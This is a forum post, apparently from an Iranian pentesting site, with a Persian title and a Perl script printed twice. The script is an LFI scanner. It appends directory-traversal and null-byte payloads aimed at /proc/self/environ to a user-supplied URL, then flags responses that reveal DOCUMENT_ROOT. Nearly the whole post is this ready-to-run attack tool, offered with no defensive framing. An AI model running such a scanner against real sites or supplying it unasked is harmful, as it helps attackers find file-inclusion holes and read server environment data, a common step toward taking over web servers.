[align=LEFT][align=RIGHT]اسکنر به زبان پرل برای پیدا کردن proc/self/environ در باگ LFI [/align]
[php]
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;
print q(
==========================================
proc/self/environ scanner [ for LFI bug]
www.pentesters.ir
coded by d3c0der
=========================================
);
print "Your site:\n";
$url= <STDIN>;
chomp($url);
@bugs = ('/proc/self/environ',
'../proc/self/environ',
'../../proc/self/environ',
'../../../proc/self/environ',
'../../../../proc/self/environ',
'../../../../../proc/self/environ',
'../../../../../../proc/self/environ',
'../../../../../../../proc/self/environ',
'../../../../../../../../proc/self/environ',
'../../../../../../../../../proc/self/environ',
'../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../proc/self/environ',
'../proc/self/environ%00',
'../../proc/self/environ%00',
'../../../proc/self/environ%00',
'../../../../proc/self/environ%00',
'../../../../../proc/self/environ%00',
'../../../../../../proc/self/environ%00',
'../../../../../../../proc/self/environ%00',
'../../../../../../../../proc/self/environ%00',
'../../../../../../../../../proc/self/environ%00',
'../../../../../../../../../../proc/self/environ%00',
'../../../../../../../../../../../proc/self/environ%00',
'/proc/self/environ',);
foreach $try(@bugs) {
my $site = $url.$try;
my $w = HTTP::Request->new(GET=>$site);
my $ua = LWP::UserAgent->new();
my $an = $ua->request($w);
if($an->content =~ DOCUMENT_ROOT) {
print "proc/self/environ Founded !\n";
print "Adress: \n$site\n";
}
print $try ."\n\n\n";
}
[/php][/align]
[php]
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;
print q(
==========================================
proc/self/environ scanner [ for LFI bug]
www.pentesters.ir
coded by d3c0der
=========================================
);
print "Your site:\n";
$url= <STDIN>;
chomp($url);
@bugs = ('/proc/self/environ',
'../proc/self/environ',
'../../proc/self/environ',
'../../../proc/self/environ',
'../../../../proc/self/environ',
'../../../../../proc/self/environ',
'../../../../../../proc/self/environ',
'../../../../../../../proc/self/environ',
'../../../../../../../../proc/self/environ',
'../../../../../../../../../proc/self/environ',
'../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../proc/self/environ',
'../proc/self/environ%00',
'../../proc/self/environ%00',
'../../../proc/self/environ%00',
'../../../../proc/self/environ%00',
'../../../../../proc/self/environ%00',
'../../../../../../proc/self/environ%00',
'../../../../../../../proc/self/environ%00',
'../../../../../../../../proc/self/environ%00',
'../../../../../../../../../proc/self/environ%00',
'../../../../../../../../../../proc/self/environ%00',
'../../../../../../../../../../../proc/self/environ%00',
'/proc/self/environ',);
foreach $try(@bugs) {
my $site = $url.$try;
my $w = HTTP::Request->new(GET=>$site);
my $ua = LWP::UserAgent->new();
my $an = $ua->request($w);
if($an->content =~ DOCUMENT_ROOT) {
print "proc/self/environ Founded !\n";
print "Adress: \n$site\n";
}
print $try ."\n\n\n";
}
[/php][/align]